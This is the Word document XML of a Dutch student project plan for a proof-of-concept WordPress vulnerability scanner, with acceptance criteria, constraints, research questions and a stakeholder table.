            </w:r>
            <w:r w:rsidR="00A15040">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A55164" w14:paraId="170D4AB9" w14:textId="77777777" w:rsidTr="00A551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87" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6843A725" w14:textId="27ECFD15" w:rsidR="00BB67B2" w:rsidRDefault="00556574" w:rsidP="006822D8">
            <w:r>
              <w:t>Project acceptatiecriteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="509EFA0C" w14:textId="77777777" w:rsidR="00BB67B2" w:rsidRDefault="001075F7" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Het systeem van de Proof of Concept zal aan de volgende eisen moeten voldoen;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE771BF" w14:textId="77777777" w:rsidR="001075F7" w:rsidRDefault="001075F7" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D039402" w14:textId="76081401" w:rsidR="001075F7"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en Wordpress extensie waarmee scans aangevraagd kunnen worden.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCA8811" w14:textId="77777777" w:rsidR="001075F7" w:rsidRDefault="00BF6FAE"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ebapplicatie scanner</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A074094" w14:textId="77777777" w:rsidR="00BF6FAE"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scant op m</w:t>
            </w:r>
            <w:r w:rsidR="006B50DA">
              <w:t xml:space="preserve">inimaal 3 </w:t>
            </w:r>
            <w:r>
              <w:t>kwetsbaarheden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54593477" w14:textId="77777777"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genereerd een rapport op basis van de geïdentificeerde kwetsbaarheden.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06702377" w14:textId="7D3EA978"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gegenereerde rapporten worden via een Mailing service opgestuurd naar de klant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A55164" w14:paraId="0635EFF2" w14:textId="77777777" w:rsidTr="00A55164">
        <w:trPr>
          <w:trHeight w:val="1522"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1887" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F86169" w14:textId="57D2D069" w:rsidR="00BB67B2" w:rsidRDefault="00556574" w:rsidP="006822D8">
            <w:r>
              <w:t>Project beperkingen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F539DA9" w14:textId="4E716B42" w:rsidR="00BC24DD" w:rsidRDefault="00BC24DD" w:rsidP="0036021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is een individueel project.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D77222F" w14:textId="34538F34" w:rsidR="00BC24DD" w:rsidRDefault="00BC24DD" w:rsidP="00BC24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systeem wordt ontwikkeld in een PHP Framework en zal gekoppeld worden aan een SQL-database.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A798002" w14:textId="77777777" w:rsidR="00BC24DD" w:rsidRDefault="00BC24DD" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1ABE00EB" w14:textId="1166BD41" w:rsidR="00BC24DD" w:rsidRDefault="00BC24DD" w:rsidP="00BC24DD">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="273DAA13" w14:textId="65E1CC19" w:rsidR="00CF222D" w:rsidRDefault="005864CF" w:rsidP="006822D8">
      <w:r>
        <w:t>Tabel 1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A112F3" w14:textId="6847A316" w:rsidR="00794923" w:rsidRDefault="00DD0876" w:rsidP="006822D8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B62503" w14:textId="50DF4729"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3343B"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FD002D">
        <w:t xml:space="preserve">1.4 </w:t>
      </w:r>
      <w:r w:rsidR="006822D8" w:rsidRPr="006D01D5">
        <w:t>Onderzoek opzet</w:t>
      </w:r>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0DA8D80D" w14:textId="19F80B17" w:rsidR="00D36FA0" w:rsidRDefault="00650BF0" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Webapplicatie scanners</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29E5153B" w14:textId="04958737" w:rsidR="00B324F9"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p w14:paraId="03E0F933" w14:textId="4001153F"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4632BB0E">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1C80"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" fillcolor="#c5e0b3 [1305]" strokecolor="#c5e1b4" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve">1.5 </w:t>
      </w:r>
      <w:r w:rsidR="006822D8" w:rsidRPr="00D82484">
        <w:t>Project context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4C6DB" w14:textId="3679C8B0" w:rsidR="006822D8" w:rsidRPr="002203B6" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002203B6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Doelstelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2576EC" w14:textId="340AADB3" w:rsidR="00F6370B" w:rsidRPr="00354798" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:r>
        <w:t xml:space="preserve">Het doel is om een Proof Of Concept te ontwikkelen voor een </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="007063AC">
        <w:t xml:space="preserve"> iedere website-eigenaar gebruik van kan maken om hun website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> op kwetsbaarheden te kunnen laten scannen.</w:t>
      </w:r>
      <w:r w:rsidR="008104ED">
        <w:t xml:space="preserve"> De webapplicatie scanner wordt met een Wordpress extensie bedient</w:t>
      </w:r>
      <w:r w:rsidR="00632A13">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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6981527" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>De opdracht is het onderzoeken en ontwikkelen van een s</w:t>
      </w:r>
      <w:r w:rsidR="003B78B2">
        <w:t xml:space="preserve">ysteem dat WordPress </w:t>
      </w:r>
      <w:r>
        <w:t>website scant op kwetsbaarheden.</w:t>
      </w:r>
      <w:r w:rsidR="005C045F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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4CAA2B3B"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w:t>
      </w:r>
      <w:r w:rsidR="001332B0">
        <w:t xml:space="preserve"> van Wordpress website</w:t>
      </w:r>
      <w:r w:rsidR="00412A53">
        <w:t xml:space="preserve">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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Voor wie is de </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="0047039D">
        <w:t xml:space="preserve"> bedoelt?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2E9CB" w14:textId="588C610F" w:rsidR="006822D8" w:rsidRPr="0055327A" w:rsidRDefault="0055327A" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0055327A">
        <w:t xml:space="preserve">Wat is een </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="006822D8" w:rsidRPr="0055327A">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52872D" w14:textId="35616F17" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wat zijn de tools en technieken die ik kan gebruiken bij het ontwikkelen van een</w:t>
      </w:r>
      <w:r w:rsidR="00DC7258">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EFC937" w14:textId="43623B9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650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A961569" w14:textId="5AC01E08" w:rsidR="00EF79AD" w:rsidRDefault="00EF79AD" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:sectPr w:rsidR="00EF79AD" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId21"/>
          <w:headerReference w:type="first" r:id="rId22"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>Hoe ziet het eindproduct eruit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CB452" w14:textId="4FCED1F4" w:rsidR="00682377" w:rsidRDefault="00B16854" w:rsidP="0042566C">
      <w:pPr>
        <w:ind w:left="-1417"/>
        <w:sectPr w:rsidR="00682377" w:rsidSect="006F74C4">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="0" w:bottom="1417" w:left="0"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90048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="305DBCCC" wp14:editId="01C6208C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>567055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3333115</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E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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41" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:44.65pt;margin-top:262.45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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5895D7E0" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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Pr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252291072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="593005A2" wp14:editId="68F7B420">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>378138</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>299466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9BE6F" id="Rounded Rectangle 201" o:spid="_x0000_s1026" style="position:absolute;margin-left:29.75pt;margin-top:235.8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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00534DB4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252346368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C0473B2" wp14:editId="4A66D433">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>577215</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>24130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0">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534DB4">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252288000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="369179FB" wp14:editId="43293309">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>443865</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>172593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E2204E" w:rsidRPr="00A14BEE" w:rsidRDefault="00E2204E"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42" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.95pt;margin-top:135.9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leHXwCAABl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="153D4CE9" w14:textId="2395DAFC" w:rsidR="00E2204E" w:rsidRPr="00A14BEE" w:rsidRDefault="00E2204E"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6F74C4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252281856" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C1D1714" wp14:editId="4CCC1350">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-62230</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7619365" cy="10746740"/>
                <wp:effectExtent l="0" t="0" r="26035" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="569" name="Rectangle 569"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7619365" cy="1074674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3D65" id="Rectangle 569" o:spid="_x0000_s1026" style="position:absolute;margin-left:-4.9pt;margin-top:-70.8pt;width:599.95pt;height:846.2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" fillcolor="#70ad47" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="74246C3C" w14:textId="4D38534E"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2492A39A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-916131</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3317275</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7C291" id="Rectangle 567" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.15pt;margin-top:-261.15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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D12A39">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="008A182A">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00D12A39" w:rsidRPr="00D12A39">
        <w:t>usiness</w:t>
      </w:r>
      <w:r w:rsidR="0009402E">
        <w:t xml:space="preserve"> Context</w:t>
      </w:r>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GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2402"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F632C9" w14:paraId="4831F383"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2DB2D1" w14:textId="22488D51" w:rsidR="00C43F3F" w:rsidRDefault="00C43F3F" w:rsidP="00376604">
            <w:r>
              <w:t>Business doelen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F632C9" w14:paraId="24354E5C"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57BE88" w14:textId="546225B4" w:rsidR="00C43F3F" w:rsidRDefault="00C43F3F" w:rsidP="00376604">
            <w:r>
              <w:t>Stakeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F632C9" w14:paraId="5FF3AD34" w14:textId="77777777" w:rsidTr="005A427C">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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63F1E77D" w:rsidR="0054788A" w:rsidRDefault="00767E9B" w:rsidP="003462BE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00FA5E1D">
        <w:t xml:space="preserve">Stakeholders en </w:t>
      </w:r>
      <w:r>
        <w:t>Business doelen</w:t>
      </w:r>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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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2EF9E348" w:rsidR="000A3B05" w:rsidRDefault="0062121F" w:rsidP="000A3B05">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="000A3B05">
        <w:t>Stakeholders</w:t>
      </w:r>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609293B0" w:rsidR="003E7585" w:rsidRDefault="00F34FAA">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251949056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17695B4E" wp14:editId="2F66F143">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>942340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>387985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3776980" cy="284734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6980" cy="2847340"/>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8AF6D10" w:rsidR="00F67D19" w:rsidRDefault="002F1545">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C37ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B22B1">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D92FC5">
        <w:tab/>
        <w:t>Figuur 2.1</w:t>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6C1F8F02">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-909781</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1142148</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144DF" id="Rectangle 49" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.65pt;margin-top:-89.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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006813C6">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GridTable4-Accent6"/>
        <w:tblW w:w="9357" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1046"/>
        <w:gridCol w:w="4650"/>
        <w:gridCol w:w="3661"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F5608B" w14:paraId="63680853" w14:textId="77777777" w:rsidTr="005A427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Stakeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E438E9" w14:textId="13EB7958" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E"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Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="224725A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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707A637A" w14:textId="151B0BCA"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22A47733"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Klanten van S5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3958E70C" w14:textId="6152928C"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2AF6714B"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Ontwikkelaars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D6C333D" w14:textId="37CCE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33DCA1A8"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Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="007F6F47" w14:textId="49E166B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01460BC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3232709C" w14:textId="0B13F278" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5416DB69" w14:textId="1F22E8B2" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00B16316" w:rsidP="005B1B18">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Concurrentie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BEC3F53" w14:textId="672D6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r w:rsidR="00F5608B" w14:paraId="42CC97BA" w14:textId="77777777" w:rsidTr="005A427C">
        <w:trPr>
          <w:trHeight w:val="1013"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34680FEA" w14:textId="7D319CD4" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17374799" w14:textId="6C7A595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Bijdragers (ontwikkelaars)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC265EA" w14:textId="52487C83"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Secondaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="3A074014" w14:textId="77777777" w:rsidTr="005A427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46" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59971569" w14:textId="43320FBD" w:rsidR="00ED14AA" w:rsidRPr="00F5608B" w:rsidRDefault="00ED14AA" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="141D3770" w14:textId="2CC177BB"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ogrammeer Libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE47271" w14:textId="41DD9FB5"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bl>
    <w:p w14:paraId="54DFCDBA" w14:textId="1C4A1F7E" w:rsidR="006813C6" w:rsidRDefault="00272E09" w:rsidP="005B1B18">
      <w:r>
        <w:t>Tabel 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A6D5A" w14:textId="5A20BE54" w:rsidR="005B0DB7" w:rsidRDefault="00126FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>De</w:t>
      </w:r>
      <w:r w:rsidR="005B0DB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> stakeholders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989D50D" w14:textId="425B2051"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r w:rsidR="00156F3E">
        <w:t xml:space="preserve"> Secondaire</w:t>
      </w:r>
      <w:r w:rsidR="00D03474">
        <w:t xml:space="preserve"> stakeholders hebben indirect invloed op het project </w:t>
      </w:r>
      <w:r w:rsidR="00BD2530">
        <w:t>en hebben een meestal een klein belang bij het project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EFE18" w14:textId="77925665" w:rsidR="00F322D2" w:rsidRDefault="00F322D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F322D2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rollen</w:t>
      </w:r>
      <w:r w:rsidR="00B3151C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> van primaire stackholders</w:t>
      </w:r>
    </w:p>
